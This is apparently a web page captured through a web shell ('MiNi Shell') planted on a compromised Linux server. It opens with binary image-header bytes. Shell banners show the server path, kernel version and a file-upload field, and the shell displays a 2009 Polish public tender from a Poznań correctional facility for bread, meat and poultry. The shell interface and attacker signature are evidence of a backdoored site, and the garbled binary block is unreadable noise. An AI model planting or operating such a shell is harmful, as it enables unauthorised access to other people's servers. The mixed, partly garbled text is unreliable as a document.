JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090423/118714-N-2009.html

<p class="kh_header"><b>Poznań: Ogłoszenie o przetargu nieograniczonym o wartości poniżej 60 000 Euro na dostawę pieczywa oraz mięsa, wędlin i drobiu.</b><br>
<b>Numer ogłoszenia: 118714 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Poprawczy , ul. Wagrowska 9, 61-372 Poznań, woj. wielkopolskie, tel. 061 8773719 w. 205, faks 061 8773767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.zp.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostaka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ogłoszenie o przetargu nieograniczonym o wartości poniżej 60 000 Euro na dostawę pieczywa oraz mięsa, wędlin i drobiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w trybie przetargu nieograniczonego o wartości nie przekraczającej równowartości w złotych 60 000 Euro jest dostawa do siedziby zamawiającego Zakład Poprawczy w Poznaniu ul. Wagrowska 9, 61-372 Poznań artykułów spożywczych z podziałem na dwa zadania. Zadanie nr 1 Dostawa Pieczywa, Zadanie nr 2 Dostawa mięsa, wędlin i drobiu. Dostarczane wyroby i produkty muszą spełniać wymagania określone w stosownych normach.    

Zadanie nr I 

Dostawa Pieczywa 

1.	Bułka pszenna zwykła 			CPV -15811400-0 	 60 kg 
2.	Bułka mleczna 				CPV -15811400-0	         50 kg 
3.	Rogal maślany 				CPV -15811200-8	         80 kg
4.	Bułka tarta 					CPV -15800000-6		120 kg
5.	Chleb żytni razowy			CPV -15811100-7		500kg 
6.	Chleb mieszany krojony foliowany 	CPV -15811100-7		12 000 kg 


Zadanie nr II

Dostawa mięsa, wędlin i drobiu.

1.	Karkówka wieprzowa  b/k świeża kl. I 	CPV - 15113000-3		400 kg
2.	Schab wieprzowy b/k świeży kl. I		CPV - 15113000-3		150 kg 
3.	Żeberka wieprzowe świeże 			CPV - 15113000-3		300 kg
4.	Szynka wieprzowa b/k świeża kl. I		CPV - 15113000-3		80 kg
5.	Mięso wieprzowe drobne świeże kl. II 	CPV - 15113000-3		1500 kg 
6.	Golonka ekstra peklowana w siatce 		CVP - 15113000-3		30 kg 
7.	Słonina świeża bez skóry mielona		CPV - 15113000-3		500 kg
8.	Parówki cienkie w osłonce naturalnej	CPV - 15131130-5		300 kg 
9.	Kiełbasa śląska 				        CPV - 15131130-5		30  kg 
10.	 Kiełbasa biała parzona 			        CPV - 15131130-5		25 kg
11.	 Parówka gruba ( flak naturalny)		CPV  - 15131130-5		150 kg
12.	Kiełbasa zwyczajna				CPV - 15131130-5		600 kg
13.	 Kiełbasa żywiecka 				CPV - 15131130-5		200 kg
14.	Kabanosy 					        CPV - 15131130-5		5 kg 
15.	Szynka gotowana 				CPV - 15131410-2		120 kg 
16.	Szynka wieprzowa mielona blok		CPV - 15131130-5		250 kg 
17.	Szynka konserwowa				CPV - 15131130-5		150 kg 
18.	Boczek wędzony 				        CPV - 15131220-3		50 kg 
19.	Pieczeń rzymska 				        CPV - 15131130-5		200 kg 
20.	Szynka w galarecie z warzywami 		CPV - 15131130-5		150 kg 
21.	Wątrobianka 					CPV - 15131310-1		250 kg 
22.	Baleron 					        CPV - 15131130-5		80 kg 
23.	Kaszanka z kasy gryczanej			CPV - 15131134-3		150 kg 
24.	Mortadela z warzywami 			        CPV - 15131130-5		150 kg 
25.	Szynka drobiowa 				        CPV - 15131135-0		250 kg 
26.	Polędwica sopocka drobiowa			CPV - 15131135-0		100 kg
27.	Szynka wędzona				        CPV - 15131210-0		50 kg
28.	Szynka z  koperkiem				CPV - 15131135-0		120 kg
29.	Indyk faszerowany 				CPV - 15131135-0		120 kg
30.	Salceson czarny 	        			CPV - 15131130-5		80 kg
31.	Metka cebulowa		        		CPV - 15131130-5		80 kg
32.	Łopatka konserwowa blok 		       CPV -  15131130-5		100 kg
33.	Szynka chlebowa				       CPV -  15131410-2		120 kg
34.	Rolada boczkowa				       CPV -  15131130-5		 100 kg
35.	Pasztet z drobiu firmowy 115g-135g		CPV - 15131310-1		243 kg
36.	Filet z piersi kurczaka świeży 		        CPV - 15112130-6		200 kg 
37.	Filet z piersi indyka b/k świeży  		CPV - 15112120-3		100 kg 
38.	Wątroba z kurczaka świeża			CPV - 15112300-9		200 kg
39.	Kurczak cały świeży 				CPV - 15112130-6		1100 kg 
40.	Ćwiartka kurczaka tylna			        CPV - 15112130-6		500 kg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, (środki transportu dostosowane do przewozu danego rodzaju żywności)
-  w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania   zrealizowali należycie co najmniej dwie dostawy, odpowiadające swoim rodzajem 
i wartością dostawom stanowiącym przedmiot zamówienia (odpowiednio do części zamówienia, na którą składana będzie oferta), 
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ustawy 
Ocena spełniania powyższych warunków dokonana zostanie według formuły spełnia/nie spełnia, na podstawie dokumentów i oświadczeń złożonych wraz z ofertą, wymienionych   w rozdz. XIII SIWZ.

 Zamawiający nie dopuszcza możliwości powierzenia realizacji zamówienia lub jego części podwykonawcom.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Celem potwierdzenia spełnienia warunków stawianych Wykonawcom przez Zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty lub poświadczone za zgodność z oryginałem ich kserokopie lub odpisy wg załączonego do oferty spisu treści:
a)	formularz ofertowy - załącznik nr 1
b)	formularz cenowy - załącznik nr 2 lub załącznik Nr 3, w zależności od Zadania, którego dotyczy oferta
c)	oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 4
d)	jeżeli oferta zostaje podpisana przez pełnomocnika Wykonawcy, jest on zobowiązany do załączenia pełnomocnictwa udzielonego przez Wykonawcę,
e)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie                         do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu                         do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
f)	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,                                      lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie                        lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
g)	Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie - wg załącznika Nr 5,

h)   wykaz niezbędnych do wykonania zamówienia samochodów przystosowanych     do transportu żywności - wg załącznika Nr 6, którymi dysponuje lub będzie dysponował wykonawca.
i )  pisemnego zobowiązania innych podmiotów do udostępniania niezbędnych do wykonania zamówienia samochodów, jeżeli w wykazie wg załącznika Nr 6 o którym mowa w pkt h) wykonawca wskazał samochody , którymi będzie dysponował


2. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, oferta musi zawierać następujące dokumenty lub poświadczone za zgodność z oryginałem ich kserokopie lub odpisy.

a) zaświadczenie (lub inny dokument) właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej poświadczające, że Wykonawca wdrożył i stosuje system nadzoru HACCP ( podstawa prawna: art. 30 ust. 1 oraz art. 40 ust. 3 i ust. 5 ustawy z dnia 11 maja 2001 r. o warunkach zdrowotnych żywności i żywienia (Dz. U. z 2005 Nr 31, poz. 265 ze zmianami),

3. Podmioty występujące wspólnie powinny dołączyć do oferty pełnomocnictwo ustanawiające lidera konsorcjum, upoważnionego do reprezentowania podmiotu wspólnego, wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów (pełnomocnik powinien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego partnera, na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu). Każdy z członków Konsorcjum załącza do oferty dokumenty właściwe dla jego firmy.
4. Dokumenty dołączone do oferty, sporządzone w języku obcym, składane są wraz                                z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego. 
5. Wykonawcy posiadający swoją siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składają dokumenty w formie oryginału, odpisu, wypisu, wyciągu lub kopii przetłumaczonych na język polski. 
6.Wykonawca posiadający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa zamiast dokumentów wymienionych w pkt 13.1. lit. e i f, dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub adres zamieszkania potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa pkt. 6 lit. a i c powinny być wystawione nie wcześniej                       niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału                            w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w pkt .6 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 6., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.poznan.zp.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Poprawczy ul. Wagrowska 9, 61-372 Poznań.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, Zakład Poprawczy ul. Wagrowska 9, 61-372 Poznań, w sekretariacie, nie później niż do dnia 07.05.2009 r. roku do godz.10.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przetarg nieograniczony na dostawę artykułów spożywczych zadanie nr I dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w trybie przetargu nieograniczonego o wartości nie przekraczającej równowartości w złotych 60 000 Euro jest dostawa do siedziby zamawiającego Zakład Poprawczy w Poznaniu ul. Wagrowska 9, 61-372 Poznań artykułów spożywczych - Dostawa Pieczywa
Dostawa Pieczywa 

1.	Bułka pszenna zwykła 			CPV -15811400-0 	60 kg 
2.	Bułka mleczna 				CPV -15811400-0		 50 kg 
3.	Rogal maślany 				CPV -15811200-8		 80 kg
4.	Bułka tarta 					CPV -15800000-6		120 kg
5.	Chleb żytni razowy			CPV -15811100-7		500kg 
6.	Chleb mieszany krojony foliowany 	CPV -15811100-7		12 000 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przetarg nieograniczony na dostawę artykułów spożywczych zadanie nr 2 dostawa mięsa, wędlin i drobiu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w trybie przetargu nieograniczonego o wartości nie przekraczającej równowartości w złotych 60 000 Euro jest dostawa do siedziby zamawiającego Zakład Poprawczy w Poznaniu ul. Wagrowska 9, 61-372 Poznań artykułów spożywczych - Dostawa mięsa, wędlin i drobiu

1.	Karkówka wieprzowa  b/k świeża kl. I 	CPV - 15113000-3		400 kg
2.	Schab wieprzowy b/k świeży kl. I		CPV - 15113000-3		150 kg 
3.	Żeberka wieprzowe świeże 			CPV - 15113000-3		300 kg
4.	Szynka wieprzowa b/k świeża kl. I		CPV - 15113000-3		80 kg
5.	Mięso wieprzowe drobne świeże kl. II 	CPV - 15113000-3		1500 kg 
6.	Golonka ekstra peklowana w siatce 		CVP - 15113000-3		30 kg 
7.	Słonina świeża bez skóry mielona		CPV - 15113000-3		500 kg
8.	Parówki cienkie w osłonce naturalnej	CPV - 15131130-5		300 kg 
9.	Kiełbasa śląska 				        CPV - 15131130-5		30  kg 
10.	 Kiełbasa biała parzona 			        CPV - 15131130-5		25 kg
11.	 Parówka gruba ( flak naturalny)		CPV  - 15131130-5		150 kg
12.	Kiełbasa zwyczajna				CPV - 15131130-5		600 kg
13.	 Kiełbasa żywiecka 				CPV - 15131130-5		200 kg
14.	Kabanosy 					        CPV - 15131130-5		5 kg 
15.	Szynka gotowana 				CPV - 15131410-2		120 kg 
16.	Szynka wieprzowa mielona blok		CPV - 15131130-5		250 kg 
17.	Szynka konserwowa				CPV - 15131130-5		150 kg 
18.	Boczek wędzony 				        CPV - 15131220-3		50 kg 
19.	Pieczeń rzymska 				        CPV - 15131130-5		200 kg 
20.	Szynka w galarecie z warzywami 		CPV - 15131130-5		150 kg 
21.	Wątrobianka 					CPV - 15131310-1		250 kg 
22.	Baleron 					        CPV - 15131130-5		80 kg 
23.	Kaszanka z kasy gryczanej			CPV - 15131134-3		150 kg 
24.	Mortadela z warzywami 			        CPV - 15131130-5		150 kg 
25.	Szynka drobiowa 				        CPV - 15131135-0		250 kg 
26.	Polędwica sopocka drobiowa			CPV - 15131135-0		100 kg
27.	Szynka wędzona				        CPV - 15131210-0		50 kg
28.	Szynka z  koperkiem				CPV - 15131135-0		120 kg
29.	Indyk faszerowany 				CPV - 15131135-0		120 kg
30.	Salceson czarny 				        CPV - 15131130-5		80 kg
31.	Metka cebulowa				        CPV - 15131130-5		80 kg
32.	Łopatka konserwowa blok		        CPV -  15131130-5		100 kg
33.	Szynka chlebowa				        CPV -  15131410-2		120 kg
34.	Rolada boczkowa				        CPV -  15131130-5		 100 kg
35.	Pasztet z drobiu firmowy 115 g-135 g	CPV - 15131310-1		243 kg
36.	Filet z piersi kurczaka świeży 		        CPV - 15112130-6		200 kg 
37.	Filet z piersi indyka b/k świeży  		CPV - 15112120-3		100 kg 
38.	Wątroba z kurczaka świeża			CPV - 15112300-9		200 kg
39.	Kurczak cały świeży 				CPV - 15112130-6		1100 kg 
40.	Ćwiartka kurczaka tylna			        CPV - 15112130-6		500 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com